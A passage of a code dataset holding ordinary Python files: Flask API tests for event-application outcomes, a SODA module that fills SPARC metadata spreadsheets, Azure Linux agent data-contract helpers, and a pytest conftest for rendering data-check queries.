data={'event_id': self.event1.id},
headers=self.get_auth_header_for('<EMAIL>'))
data = json.loads(response.data)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(data), 2)
self.assertItemsEqual([o['user']['email'] for o in data], ['<EMAIL>', '<EMAIL>']) | api/app/outcome/tests.py | import json
from datetime import datetime, timedelta
from app import db, LOGGER
from app.utils.testing import ApiTestCase
from app.outcome.models import Outcome, Status
from app.outcome.repository import OutcomeRepository as outcome_repository
class OutcomeApiTest(ApiTestCase):
def seed_static_data(self):
db.session.expire_on_commit = False
self.event1 = self.add_event(name={'en': 'Event 1'}, key='event1')
self.event2 = self.add_event(name={'en': 'Event 2'}, key='event2')
self.test_user1 = self.add_user('<EMAIL>')
self.test_user2 = self.add_user('<EMAIL>')
self.event1_admin = self.add_user('<EMAIL>')
self.event2_admin = self.add_user('<EMAIL>')
self.event1.add_event_role('admin', self.event1_admin.id)
self.event2.add_event_role('admin', self.event2_admin.id)
# Add 2 outcomes for event 1 to user 1
self.event1_user1_outcome1 = Outcome(self.event1.id, self.test_user1.id, 'WAITLIST', self.event1_admin.id)
self.event1_user1_outcome1.reset_latest()
self.event1_user1_outcome2 = Outcome(self.event1.id, self.test_user1.id, 'ACCEPTED', self.event1_admin.id)
# Add 1 outcome for event 1 to user 2
self.event1_user2_outcome = Outcome(self.event1.id, self.test_user2.id, 'REJECTED', self.event1_admin.id)
# Add 1 outcome for event 2 to user 1
self.event2_user1_outcome = Outcome(self.event2.id, self.test_user1.id, 'WAITLIST', self.event2_admin.id)
db.session.add_all([
self.event1_user1_outcome1,
self.event1_user1_outcome2,
self.event1_user2_outcome,
self.event2_user1_outcome
])
db.session.commit()
self.add_email_template('outcome-rejected')
self.add_email_template('outcome-waitlist')
db.session.flush()
self.event1_user1_outcome1_id = self.event1_user1_outcome1.id
self.event1_user1_outcome2_id = self.event1_user1_outcome2.id
self.event1_user2_outcome_id = self.event1_user2_outcome.id
self.event2_user1_outcome_id = self.event2_user1_outcome.id
self.test_user1_id = self.test_user1.id
def test_repository_get_latest_by_user_for_event(self):
"""Test that repository method gets the correct latest outcome for a user."""
self.seed_static_data()
result = outcome_repository.get_latest_by_user_for_event(self.test_user1.id, self.event1.id)
self.assertEqual(result.id, self.event1_user1_outcome2.id)
self.assertEqual(result.status, Status.ACCEPTED)
result = outcome_repository.get_latest_by_user_for_event(self.test_user2.id, self.event1.id)
self.assertEqual(result.id, self.event1_user2_outcome.id)
self.assertEqual(result.status, Status.REJECTED)
def test_get_all_by_user_for_event(self):
"""Test that repository method gets all outcomes for a user."""
self.seed_static_data()
result = outcome_repository.get_all_by_user_for_event(self.test_user1.id, self.event1.id)
self.assertEqual(len(result), 2)
self.assertItemsEqual([o.id for o in result], [self.event1_user1_outcome1.id, self.event1_user1_outcome2.id])
def test_get_latest_for_event(self):
"""Test that repository method gets the latest outcomes for an event."""
self.seed_static_data()
result = outcome_repository.get_latest_for_event(self.event1.id)
self.assertEqual(len(result), 2)
self.assertItemsEqual([o.id for o in result], [self.event1_user1_outcome2.id, self.event1_user2_outcome.id])
def test_outcome_get(self):
"""Test usual get case."""
self.seed_static_data()
response = self.app.get(
'/api/v1/outcome',
data={'event_id': self.event1.id},
headers=self.get_auth_header_for('<EMAIL>'))
data = json.loads(response.data)
self.assertEqual(response.status_code, 200)
self.assertEqual(data['id'], self.event1_user1_outcome2_id)
self.assertEqual(data['status'], 'ACCEPTED')
self.assertEqual(data['timestamp'], self.event1_user1_outcome2.timestamp.isoformat())
def test_get_with_no_outcome(self):
"""Test get method when there is no outcome."""
self.seed_static_data()
response = self.app.get(
'/api/v1/outcome',
data={'event_id': self.event2.id},
headers=self.get_auth_header_for('<EMAIL>'))
self.assertEqual(response.status_code, 404)
def test_outcome_post_non_event_admin(self):
"""Test that a forbidden status is given when the logged in user is not an event admin."""
self.seed_static_data()
response = self.app.post(
'/api/v1/outcome',
data={
'event_id': self.event1.id,
'user_id': self.test_user1.id,
'outcome': 'ACCEPTED'
},
headers=self.get_auth_header_for('<EMAIL>'))
data = json.loads(response.data)
self.assertEqual(response.status_code, 403)
def test_post(self):
"""Test typical post flow."""
self.seed_static_data()
response = self.app.post(
'/api/v1/outcome',
data={
'event_id': self.event2.id,
'user_id': self.test_user1.id,
'outcome': 'REJECTED'
},
headers=self.get_auth_header_for('<EMAIL>'))
data = json.loads(response.data)
self.assertEqual(response.status_code, 201)
outcomes = outcome_repository.get_all_by_user_for_event(self.test_user1_id, self.event2.id)
outcomes = list(sorted(outcomes, key=lambda o: o.timestamp))
print(outcomes)
self.assertEqual(outcomes[0].status, Status.WAITLIST)
self.assertFalse(outcomes[0].latest)
self.assertEqual(outcomes[1].status, Status.REJECTED)
self.assertTrue(outcomes[1].latest)
def test_outcome_list_get_event_admin(self):
"""Test that outcome list get can only be performed by an event admin."""
self.seed_static_data()
response = self.app.get(
'/api/v1/outcome-list',
data={'event_id': self.event1.id},
headers=self.get_auth_header_for('<EMAIL>'))
self.assertEqual(response.status_code, 403)
def test_outcome_list_get_correct_event_admin(self):
"""Test that outcome list get can only be performed by the correct event admin."""
self.seed_static_data()
response = self.app.get(
'/api/v1/outcome-list',
data={'event_id': self.event1.id},
headers=self.get_auth_header_for('<EMAIL>'))
self.assertEqual(response.status_code, 403)
def test_outcome_list_get(self):
"""Test getting all outcomes for an event."""
self.seed_static_data()
response = self.app.get(
'/api/v1/outcome-list',
data={'event_id': self.event1.id},
headers=self.get_auth_header_for('<EMAIL>'))
data = json.loads(response.data)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(data), 2)
self.assertItemsEqual([o['user']['email'] for o in data], ['<EMAIL>', '<EMAIL>']) | 0.524151 | 0.155046 |
### Import required python modules
import logging
from gevent import monkey; monkey.patch_all()
import platform
import os
from os import listdir, stat, makedirs, mkdir, walk, remove, pardir
from os.path import isdir, isfile, join, splitext, getmtime, basename, normpath, exists, expanduser, split, dirname, getsize, abspath
import pandas as pd
import time
from time import strftime, localtime
import shutil
from shutil import copy2
from configparser import ConfigParser
import numpy as np
from collections import defaultdict
import subprocess
from websocket import create_connection
import socket
import errno
import re
import gevent
from blackfynn import Blackfynn
from blackfynn.log import get_logger
from blackfynn.api.agent import agent_cmd
from blackfynn.api.agent import AgentError, check_port, socket_address
from urllib.request import urlopen
import json
import collections
from threading import Thread
import pathlib
from openpyxl import load_workbook
from openpyxl import Workbook
from openpyxl.styles import PatternFill, Font
from docx import Document
from datetime import datetime, timezone
userpath = expanduser("~")
metadatapath = join(userpath, 'SODA', 'SODA_metadata')
DEV_TEMPLATE_PATH = join(dirname(__file__), "..", "file_templates")
# once pysoda has been packaged with pyinstaller
# it becomes nested into the pysodadist/api directory
PROD_TEMPLATE_PATH = join(dirname(__file__), "..", "..", "file_templates")
TEMPLATE_PATH = DEV_TEMPLATE_PATH if exists(DEV_TEMPLATE_PATH) else PROD_TEMPLATE_PATH
logging.basicConfig(level=logging.DEBUG, filename=os.path.join(os.path.expanduser("~"), f"{__name__}.log"))
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
handler = logging.FileHandler(os.path.join(os.path.expanduser("~"), f"{__name__}.log"))
handler.setLevel(logging.DEBUG)
logger.addHandler(handler)
class InvalidDeliverablesDocument(Exception):
pass
### Import Milestone document
def import_milestone(filepath):
doc = Document(filepath)
try:
table = doc.tables[0]
except IndexError:
raise InvalidDeliverablesDocument("Please select a valid SPARC Deliverables Document! The following headers could not be found in a table of the document you selected: Related milestone, aim, or task, Description of data, and Expected date of completion.")
data = []
keys = None
for i, row in enumerate(table.rows):
text = (cell.text for cell in row.cells)
# headers will become the keys of our dictionary
if i == 0:
keys = tuple(text)
continue
# Construct a dictionary for this row, mapping
# keys to values for this row
row_data = dict(zip(keys, text))
data.append(row_data)
return data
def extract_milestone_info(datalist):
milestone = defaultdict(list)
milestone_key1 = "Related milestone, aim, or task"
milestone_key2 = "Related milestone, aim or task"
other_keys = ["Description of data", "Expected date of completion"]
for row in datalist:
if milestone_key1 in row:
milestone_key = milestone_key1
elif milestone_key2 in row:
milestone_key = milestone_key2
else:
raise InvalidDeliverablesDocument("Please select a valid SPARC Deliverables Document! The following headers could not be found in a table of the document you selected: Related milestone, aim, or task, Description of data, and Expected date of completion.")
key = row[milestone_key]
if key != "":
milestone[key].append({key: row[key] for key in other_keys})
return milestone
### Prepare submission file
def save_submission_file(filepath, json_str):
source = join(TEMPLATE_PATH, "submission.xlsx")
destination = filepath
shutil.copyfile(source, destination)
# json array to python list
val_arr = json.loads(json_str)
# write to excel file
wb = load_workbook(destination)
ws1 = wb['Sheet1']
# date_obj = datetime.strptime(val_arr[2], "%Y-%m")
# date_new = date_obj.strftime("%m-%Y")
ws1["C2"] = val_arr[0]
ws1["C3"] = val_arr[1]
ws1["C4"] = val_arr[2]
wb.save(destination)
from string import ascii_uppercase
import itertools
def excel_columns():
"""
NOTE: does not support more than 699 contributors/links
"""
# start with column D not A
single_letter = list(ascii_uppercase[3:])
two_letter = [a + b for a,b in itertools.product(ascii_uppercase, ascii_uppercase)]
return single_letter + two_letter
def rename_headers(workbook, keyword_array, contributor_role_array, funding_array, total_link_array):
"""
Rename header columns if values exceed 3. Change Additional Values to Value 4, 5,...
"""
# keywords
keyword_len = len(keyword_array)
# contributors
no_contributors = len(contributor_role_array)
# funding = SPARC award + other funding sources
funding_len = len(funding_array)
# total links added
link_len = len(total_link_array)
max_len = max(keyword_len, funding_len, link_len, no_contributors)
columns_list = excel_columns()
if max_len > 3:
workbook[columns_list[0] + "1"] = "Value"
for i, column in zip(range(2, max_len+1), columns_list[1:]):
workbook[column + "1"] = "Value " + str(i)
cell = workbook[column + "1"]
blueFill = PatternFill(start_color='9CC2E5',
end_color='9CC2E5',
fill_type='solid')
font = Font(bold=True)
cell.fill = blueFill
cell.font = font
else:
delete_range = len(columns_list) - max_len - 1
workbook.delete_cols(4+max_len, delete_range)
### Prepare dataset-description file
def populate_dataset_info(workbook, val_array):
## name, description, samples, subjects
workbook["D2"] = val_array[0]
workbook["D3"] = val_array[1]
workbook["D17"] = val_array[3]
workbook["D16"] = val_array[4]
## keywords
for i, column in zip(range(len(val_array[2])), excel_columns()):
workbook[column + "4"] = val_array[2][i]
return val_array[2]
def populate_contributor_info(workbook, val_array):
## award info
for i, column in zip(range(len(val_array["funding"])), excel_columns()):
workbook[column + "11"] = val_array["funding"][i]
### Acknowledgments
workbook["D10"] = val_array["acknowledgment"]
### Contributors
for contributor, column in zip(val_array['contributors'], excel_columns()):
workbook[column + "5"] = contributor["conName"]
workbook[column + "6"] = contributor["conID"]
workbook[column + "7"] = contributor["conAffliation"]
workbook[column + "9"] = contributor["conContact"]
workbook[column + "8"] = contributor["conRole"]
return [val_array["funding"], val_array['contributors']]
def populate_links_info(workbook, val_array):
## originating DOI, Protocol DOI
total_link_array = val_array["Originating Article DOI"] + val_array["Protocol URL or DOI*"] + val_array["Additional Link"]
for i, column in zip(range(len(total_link_array)), excel_columns()):
if total_link_array[i]["link type"] == "Originating Article DOI":
workbook[column + "12"] = total_link_array[i]["link"]
workbook[column + "13"] = ""
workbook[column + "14"] = ""
workbook[column + "15"] = total_link_array[i]["description"]
if total_link_array[i]["link type"] == "Protocol URL or DOI*":
workbook[column + "12"] = ""
workbook[column + "13"] = total_link_array[i]["link"]
workbook[column + "14"] = ""
workbook[column + "15"] = total_link_array[i]["description"]
if total_link_array[i]["link type"] == "Additional Link":
workbook[column + "12"] = ""
workbook[column + "13"] = ""
workbook[column + "14"] = total_link_array[i]["link"]
workbook[column + "15"] = total_link_array[i]["description"]
return total_link_array
def populate_completeness_info(workbook, val_array, bfaccountname):
## completeness, parent dataset ID, title Respectively
workbook["D18"] = val_array["completeness"]
workbook["D20"] = val_array["completeDSTitle"]
## parent Datasets
parentds_id_array = []
try:
bf = Blackfynn(bfaccountname)
for dataset in val_array["parentDS"]:
myds = bf.get_dataset(dataset)
dataset_id = myds.id
parentds_id_array.append(dataset_id)
workbook["D19"] = ", ".join(parentds_id_array)
except Exception as err:
# NOTE: blackfynn package 3.2.0 misspells 'invalid'
if 'Invalid profile name' in str(err) or "Invaid profile name" in str(err):
raise Exception("Please connect SODA with Blackfynn to use this feature!")
raise
### generate the file
def save_ds_description_file(bfaccountname, filepath, dataset_str, misc_str, optional_str, con_str):
source = join(TEMPLATE_PATH, "dataset_description.xlsx")
destination = filepath
shutil.copyfile(source, destination)
# json array to python list
val_arr_ds = json.loads(dataset_str)
val_arr_con = json.loads(con_str)
val_arr_misc = json.loads(misc_str)
val_arr_optional = json.loads(optional_str)
# write to excel file
wb = load_workbook(destination)
ws1 = wb['Sheet1']
ret_val_1 = populate_dataset_info(ws1, val_arr_ds)
ret_val_2 = populate_contributor_info(ws1, val_arr_con)
ret_val_3 = populate_links_info(ws1, val_arr_misc)
populate_completeness_info(ws1, val_arr_optional, bfaccountname)
rename_headers(ws1, ret_val_1, ret_val_2[1], ret_val_2[0], ret_val_3)
wb.save(destination) | src/pysoda/prepare_metadata.py |
### Import required python modules
import logging
from gevent import monkey; monkey.patch_all()
import platform
import os
from os import listdir, stat, makedirs, mkdir, walk, remove, pardir
from os.path import isdir, isfile, join, splitext, getmtime, basename, normpath, exists, expanduser, split, dirname, getsize, abspath
import pandas as pd
import time
from time import strftime, localtime
import shutil
from shutil import copy2
from configparser import ConfigParser
import numpy as np
from collections import defaultdict
import subprocess
from websocket import create_connection
import socket
import errno
import re
import gevent
from blackfynn import Blackfynn
from blackfynn.log import get_logger
from blackfynn.api.agent import agent_cmd
from blackfynn.api.agent import AgentError, check_port, socket_address
from urllib.request import urlopen
import json
import collections
from threading import Thread
import pathlib
from openpyxl import load_workbook
from openpyxl import Workbook
from openpyxl.styles import PatternFill, Font
from docx import Document
from datetime import datetime, timezone
userpath = expanduser("~")
metadatapath = join(userpath, 'SODA', 'SODA_metadata')
DEV_TEMPLATE_PATH = join(dirname(__file__), "..", "file_templates")
# once pysoda has been packaged with pyinstaller
# it becomes nested into the pysodadist/api directory
PROD_TEMPLATE_PATH = join(dirname(__file__), "..", "..", "file_templates")
TEMPLATE_PATH = DEV_TEMPLATE_PATH if exists(DEV_TEMPLATE_PATH) else PROD_TEMPLATE_PATH
logging.basicConfig(level=logging.DEBUG, filename=os.path.join(os.path.expanduser("~"), f"{__name__}.log"))
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
handler = logging.FileHandler(os.path.join(os.path.expanduser("~"), f"{__name__}.log"))
handler.setLevel(logging.DEBUG)
logger.addHandler(handler)
class InvalidDeliverablesDocument(Exception):
pass
### Import Milestone document
def import_milestone(filepath):
doc = Document(filepath)
try:
table = doc.tables[0]
except IndexError:
raise InvalidDeliverablesDocument("Please select a valid SPARC Deliverables Document! The following headers could not be found in a table of the document you selected: Related milestone, aim, or task, Description of data, and Expected date of completion.")
data = []
keys = None
for i, row in enumerate(table.rows):
text = (cell.text for cell in row.cells)
# headers will become the keys of our dictionary
if i == 0:
keys = tuple(text)
continue
# Construct a dictionary for this row, mapping
# keys to values for this row
row_data = dict(zip(keys, text))
data.append(row_data)
return data
def extract_milestone_info(datalist):
milestone = defaultdict(list)
milestone_key1 = "Related milestone, aim, or task"
milestone_key2 = "Related milestone, aim or task"
other_keys = ["Description of data", "Expected date of completion"]
for row in datalist:
if milestone_key1 in row:
milestone_key = milestone_key1
elif milestone_key2 in row:
milestone_key = milestone_key2
else:
raise InvalidDeliverablesDocument("Please select a valid SPARC Deliverables Document! The following headers could not be found in a table of the document you selected: Related milestone, aim, or task, Description of data, and Expected date of completion.")
key = row[milestone_key]
if key != "":
milestone[key].append({key: row[key] for key in other_keys})
return milestone
### Prepare submission file
def save_submission_file(filepath, json_str):
source = join(TEMPLATE_PATH, "submission.xlsx")
destination = filepath
shutil.copyfile(source, destination)
# json array to python list
val_arr = json.loads(json_str)
# write to excel file
wb = load_workbook(destination)
ws1 = wb['Sheet1']
# date_obj = datetime.strptime(val_arr[2], "%Y-%m")
# date_new = date_obj.strftime("%m-%Y")
ws1["C2"] = val_arr[0]
ws1["C3"] = val_arr[1]
ws1["C4"] = val_arr[2]
wb.save(destination)
from string import ascii_uppercase
import itertools
def excel_columns():
"""
NOTE: does not support more than 699 contributors/links
"""
# start with column D not A
single_letter = list(ascii_uppercase[3:])
two_letter = [a + b for a,b in itertools.product(ascii_uppercase, ascii_uppercase)]
return single_letter + two_letter
def rename_headers(workbook, keyword_array, contributor_role_array, funding_array, total_link_array):
"""
Rename header columns if values exceed 3. Change Additional Values to Value 4, 5,...
"""
# keywords
keyword_len = len(keyword_array)
# contributors
no_contributors = len(contributor_role_array)
# funding = SPARC award + other funding sources
funding_len = len(funding_array)
# total links added
link_len = len(total_link_array)
max_len = max(keyword_len, funding_len, link_len, no_contributors)
columns_list = excel_columns()
if max_len > 3:
workbook[columns_list[0] + "1"] = "Value"
for i, column in zip(range(2, max_len+1), columns_list[1:]):
workbook[column + "1"] = "Value " + str(i)
cell = workbook[column + "1"]
blueFill = PatternFill(start_color='9CC2E5',
end_color='9CC2E5',
fill_type='solid')
font = Font(bold=True)
cell.fill = blueFill
cell.font = font
else:
delete_range = len(columns_list) - max_len - 1
workbook.delete_cols(4+max_len, delete_range)
### Prepare dataset-description file
def populate_dataset_info(workbook, val_array):
## name, description, samples, subjects
workbook["D2"] = val_array[0]
workbook["D3"] = val_array[1]
workbook["D17"] = val_array[3]
workbook["D16"] = val_array[4]
## keywords
for i, column in zip(range(len(val_array[2])), excel_columns()):
workbook[column + "4"] = val_array[2][i]
return val_array[2]
def populate_contributor_info(workbook, val_array):
## award info
for i, column in zip(range(len(val_array["funding"])), excel_columns()):
workbook[column + "11"] = val_array["funding"][i]
### Acknowledgments
workbook["D10"] = val_array["acknowledgment"]
### Contributors
for contributor, column in zip(val_array['contributors'], excel_columns()):
workbook[column + "5"] = contributor["conName"]
workbook[column + "6"] = contributor["conID"]
workbook[column + "7"] = contributor["conAffliation"]
workbook[column + "9"] = contributor["conContact"]
workbook[column + "8"] = contributor["conRole"]
return [val_array["funding"], val_array['contributors']]
def populate_links_info(workbook, val_array):
## originating DOI, Protocol DOI
total_link_array = val_array["Originating Article DOI"] + val_array["Protocol URL or DOI*"] + val_array["Additional Link"]
for i, column in zip(range(len(total_link_array)), excel_columns()):
if total_link_array[i]["link type"] == "Originating Article DOI":
workbook[column + "12"] = total_link_array[i]["link"]
workbook[column + "13"] = ""
workbook[column + "14"] = ""
workbook[column + "15"] = total_link_array[i]["description"]
if total_link_array[i]["link type"] == "Protocol URL or DOI*":
workbook[column + "12"] = ""
workbook[column + "13"] = total_link_array[i]["link"]
workbook[column + "14"] = ""
workbook[column + "15"] = total_link_array[i]["description"]
if total_link_array[i]["link type"] == "Additional Link":
workbook[column + "12"] = ""
workbook[column + "13"] = ""
workbook[column + "14"] = total_link_array[i]["link"]
workbook[column + "15"] = total_link_array[i]["description"]
return total_link_array
def populate_completeness_info(workbook, val_array, bfaccountname):
## completeness, parent dataset ID, title Respectively
workbook["D18"] = val_array["completeness"]
workbook["D20"] = val_array["completeDSTitle"]
## parent Datasets
parentds_id_array = []
try:
bf = Blackfynn(bfaccountname)
for dataset in val_array["parentDS"]:
myds = bf.get_dataset(dataset)
dataset_id = myds.id
parentds_id_array.append(dataset_id)
workbook["D19"] = ", ".join(parentds_id_array)
except Exception as err:
# NOTE: blackfynn package 3.2.0 misspells 'invalid'
if 'Invalid profile name' in str(err) or "Invaid profile name" in str(err):
raise Exception("Please connect SODA with Blackfynn to use this feature!")
raise
### generate the file
def save_ds_description_file(bfaccountname, filepath, dataset_str, misc_str, optional_str, con_str):
source = join(TEMPLATE_PATH, "dataset_description.xlsx")
destination = filepath
shutil.copyfile(source, destination)
# json array to python list
val_arr_ds = json.loads(dataset_str)
val_arr_con = json.loads(con_str)
val_arr_misc = json.loads(misc_str)
val_arr_optional = json.loads(optional_str)
# write to excel file
wb = load_workbook(destination)
ws1 = wb['Sheet1']
ret_val_1 = populate_dataset_info(ws1, val_arr_ds)
ret_val_2 = populate_contributor_info(ws1, val_arr_con)
ret_val_3 = populate_links_info(ws1, val_arr_misc)
populate_completeness_info(ws1, val_arr_optional, bfaccountname)
rename_headers(ws1, ret_val_1, ret_val_2[1], ret_val_2[0], ret_val_3)
wb.save(destination) | 0.311951 | 0.114839 |
from azurelinuxagent.common.exception import ProtocolError
import azurelinuxagent.common.logger as logger
# pylint: disable=W0105
"""
Base class for data contracts between guest and host and utilities to manipulate the properties in those contracts
"""
# pylint: enable=W0105
class DataContract(object):
pass
class DataContractList(list):
def __init__(self, item_cls): # pylint: disable=W0231
self.item_cls = item_cls
def validate_param(name, val, expected_type):
if val is None:
raise ProtocolError("{0} is None".format(name))
if not isinstance(val, expected_type):
raise ProtocolError(("{0} type should be {1} not {2}"
"").format(name, expected_type, type(val)))
def set_properties(name, obj, data):
if isinstance(obj, DataContract): # pylint: disable=R1705
validate_param("Property '{0}'".format(name), data, dict)
for prob_name, prob_val in data.items():
prob_full_name = "{0}.{1}".format(name, prob_name)
try:
prob = getattr(obj, prob_name)
except AttributeError:
logger.warn("Unknown property: {0}", prob_full_name)
continue
prob = set_properties(prob_full_name, prob, prob_val)
setattr(obj, prob_name, prob)
return obj
elif isinstance(obj, DataContractList):
validate_param("List '{0}'".format(name), data, list)
for item_data in data:
item = obj.item_cls()
item = set_properties(name, item, item_data)
obj.append(item)
return obj
else:
return data
def get_properties(obj):
if isinstance(obj, DataContract): # pylint: disable=R1705
data = {}
props = vars(obj)
for prob_name, prob in list(props.items()):
data[prob_name] = get_properties(prob)
return data
elif isinstance(obj, DataContractList):
data = []
for item in obj:
item_data = get_properties(item)
data.append(item_data)
return data
else:
return obj | azurelinuxagent/common/datacontract.py |
from azurelinuxagent.common.exception import ProtocolError
import azurelinuxagent.common.logger as logger
# pylint: disable=W0105
"""
Base class for data contracts between guest and host and utilities to manipulate the properties in those contracts
"""
# pylint: enable=W0105
class DataContract(object):
pass
class DataContractList(list):
def __init__(self, item_cls): # pylint: disable=W0231
self.item_cls = item_cls
def validate_param(name, val, expected_type):
if val is None:
raise ProtocolError("{0} is None".format(name))
if not isinstance(val, expected_type):
raise ProtocolError(("{0} type should be {1} not {2}"
"").format(name, expected_type, type(val)))
def set_properties(name, obj, data):
if isinstance(obj, DataContract): # pylint: disable=R1705
validate_param("Property '{0}'".format(name), data, dict)
for prob_name, prob_val in data.items():
prob_full_name = "{0}.{1}".format(name, prob_name)
try:
prob = getattr(obj, prob_name)
except AttributeError:
logger.warn("Unknown property: {0}", prob_full_name)
continue
prob = set_properties(prob_full_name, prob, prob_val)
setattr(obj, prob_name, prob)
return obj
elif isinstance(obj, DataContractList):
validate_param("List '{0}'".format(name), data, list)
for item_data in data:
item = obj.item_cls()
item = set_properties(name, item, item_data)
obj.append(item)
return obj
else:
return data
def get_properties(obj):
if isinstance(obj, DataContract): # pylint: disable=R1705
data = {}
props = vars(obj)
for prob_name, prob in list(props.items()):
data[prob_name] = get_properties(prob)
return data
elif isinstance(obj, DataContractList):
data = []
for item in obj:
item_data = get_properties(item)
data.append(item_data)
return data
else:
return obj | 0.416797 | 0.319679 |
import csv
import json
import os
from pathlib import Path
import pytest
import yaml
from jinja2 import Template
# -------------------------------------
# Execute once at session start
# -------------------------------------
def omit_hints(data):
"""Set values encapsulated with <> to None in a dict"""
if isinstance(data, str):
if len(data) >= 2:
hidden = f"{data[0]}{data[-1]}" != "<>"
return data.strip() if hidden else None
return data.strip()
elif isinstance(data, list):
lst = list(filter(omit_hints, data))
return lst if lst else None
elif isinstance(data, dict):
for key in data.keys():
data[key] = omit_hints(data[key])
return data
return data
def get_table_configs():
"""Load table_config.yaml files"""
with open("files.json", "r") as file:
files = json.load(file)
folders = [Path(file).parent for file in files]
files = [folder / "table_config.yaml" for folder in folders]
files = [file for file in files if file.exists()]
files = list(set(files))
return files
def filter_table_configs(config_paths: list[Path], skipfile: Path) -> list[Path]:
"""Filter table_config.yaml files not in DATA_CHECK_SKIP.csv"""
with open(skipfile, "r") as file:
reader = csv.reader(file)
datasets = [row[0] for row in reader if len(row) > 0]
is_banned = lambda x: x.parent.parent.name not in datasets
config_paths = filter(is_banned, config_paths)
config_paths = list(config_paths)
return config_paths
def pytest_addoption(parser):
parser.addoption(
"--skipfile",
action="store",
default="",
help="csv filepath with datasets to ignore",
)
def pytest_configure(config):
global _options
_options = config.option
def pytest_sessionstart(session):
"""Initialize session, loading table configs"""
global _configs
# set filepaths for checks and configs
# change this line to "checks.yaml" for local debugging
check_path = "./.github/workflows/data-check/checks.yaml"
# replace this line with a list of table_config.yaml paths for local debugging
config_paths = get_table_configs()
# filter datasets if skipfile is activated
if _options.skipfile:
skipfile = Path(_options.skipfile)
config_paths = filter_table_configs(config_paths, skipfile)
# exit if it has no fixtures
if not config_paths:
pytest.exit("No fixtures found", 0)
# load checks with jinja2 placeholders
# and replace the project variable by the
# production environment if it's table approve action
with open(check_path, "r", encoding="utf-8") as file:
skeleton = file.read()
if os.environ.get("IS_PROD_ENV", False):
skeleton = skeleton.replace("{{ project_id }}", "basedosdados")
else:
skeleton = skeleton.replace("{{ project_id }}", "{{ project_id_prod }}")
checks = Template(skeleton)
# load checks with configs from table_config.yaml
_configs = []
for cpath in config_paths:
with open(cpath, "r") as file:
# load configs, a.k.a. table_config.yaml
config = yaml.safe_load(file)
config = omit_hints(config)
# render jinja2 checks with config definitions
config = checks.render(**config)
config = yaml.safe_load(config)
# save configs
_configs.append(config)
# create empty json report
with open("./report.json", "w") as file:
file.write("{}")
# -------------------------------------
# Execute once after session start
# -------------------------------------
def pytest_generate_tests(metafunc):
"""Link one fixture (table_config.yaml) to one test suite"""
metafunc.parametrize("configs", _configs)
# -------------------------------------
# Execute once after each test
# -------------------------------------
@pytest.hookimpl(tryfirst=True, hookwrapper=True)
def pytest_runtest_makereport(item, call):
"""Add test status for each test in report.json"""
outcome = yield
res = outcome.get_result()
if res.when == "call":
with open("./report.json", "r") as file:
config_id = item.funcargs["configs"]
config_id = config_id[item.originalname]
config_id = config_id["id"]
data = json.load(file)
data[config_id]["passed"] = not res.failed
with open("./report.json", "w") as file:
json.dump(data, file)
# -------------------------------------
# Execute once at session finish
# -------------------------------------
def pytest_sessionfinish(session, exitstatus):
"""Report overall test status in markdown"""
with open("./report.json", "r") as file:
data = json.load(file)
data = [v for _, v in data.items()]
data = sorted(data, key=lambda x: x["id"])
n = [datum["id"].split("/")[-1] for datum in data]
n = max(int(ni) for ni in n)
with open("./report.md", "w") as file:
file.write("Data Check Report\n---\n\n")
for datum in data:
if int(datum["id"].split("/")[-1]) == 0:
file.write(f" Table `{datum['id'][:-2]}` \n\n")
if datum["passed"]:
file.write(f"✔️ {datum['name']} \n\n")
else:
file.write(f"❌ {datum['name']} \n\n")
file.write(f"```sql \n")
file.write(f"{datum['query']}")
file.write(f"``` \n\n")
if int(datum["id"].split("/")[-1]) == n:
file.write("---\n\n")
# -------------------------------------
# Reference
# https://docs.pytest.org/en/6.2.x/contents.html
# ------------------------------------- | .github/workflows/data-check/conftest.py |
import csv
import json
import os
from pathlib import Path
import pytest
import yaml
from jinja2 import Template
# -------------------------------------
# Execute once at session start
# -------------------------------------
def omit_hints(data):
"""Set values encapsulated with <> to None in a dict"""
if isinstance(data, str):
if len(data) >= 2:
hidden = f"{data[0]}{data[-1]}" != "<>"
return data.strip() if hidden else None
return data.strip()
elif isinstance(data, list):
lst = list(filter(omit_hints, data))
return lst if lst else None
elif isinstance(data, dict):
for key in data.keys():
data[key] = omit_hints(data[key])
return data
return data
def get_table_configs():
"""Load table_config.yaml files"""
with open("files.json", "r") as file:
files = json.load(file)
folders = [Path(file).parent for file in files]
files = [folder / "table_config.yaml" for folder in folders]
files = [file for file in files if file.exists()]
files = list(set(files))
return files
def filter_table_configs(config_paths: list[Path], skipfile: Path) -> list[Path]:
"""Filter table_config.yaml files not in DATA_CHECK_SKIP.csv"""
with open(skipfile, "r") as file:
reader = csv.reader(file)
datasets = [row[0] for row in reader if len(row) > 0]
is_banned = lambda x: x.parent.parent.name not in datasets
config_paths = filter(is_banned, config_paths)
config_paths = list(config_paths)
return config_paths
def pytest_addoption(parser):
parser.addoption(
"--skipfile",
action="store",
default="",
help="csv filepath with datasets to ignore",
)
def pytest_configure(config):
global _options
_options = config.option
def pytest_sessionstart(session):
"""Initialize session, loading table configs"""
global _configs
# set filepaths for checks and configs
# change this line to "checks.yaml" for local debugging
check_path = "./.github/workflows/data-check/checks.yaml"
# replace this line with a list of table_config.yaml paths for local debugging
config_paths = get_table_configs()
# filter datasets if skipfile is activated
if _options.skipfile:
skipfile = Path(_options.skipfile)
config_paths = filter_table_configs(config_paths, skipfile)
# exit if it has no fixtures
if not config_paths:
pytest.exit("No fixtures found", 0)
# load checks with jinja2 placeholders
# and replace the project variable by the
# production environment if it's table approve action
with open(check_path, "r", encoding="utf-8") as file:
skeleton = file.read()
if os.environ.get("IS_PROD_ENV", False):
skeleton = skeleton.replace("{{ project_id }}", "basedosdados")
else:
skeleton = skeleton.replace("{{ project_id }}", "{{ project_id_prod }}")
checks = Template(skeleton)
# load checks with configs from table_config.yaml
_configs = []
for cpath in config_paths:
with open(cpath, "r") as file:
# load configs, a.k.a. table_config.yaml
config = yaml.safe_load(file)
config = omit_hints(config)
# render jinja2 checks with config definitions
config = checks.render(**config)
config = yaml.safe_load(config)
# save configs
_configs.append(config)
# create empty json report
with open("./report.json", "w") as file:
file.write("{}")
# -------------------------------------
# Execute once after session start
# -------------------------------------
def pytest_generate_tests(metafunc):
"""Link one fixture (table_config.yaml) to one test suite"""
metafunc.parametrize("configs", _configs)
# -------------------------------------
# Execute once after each test
# -------------------------------------
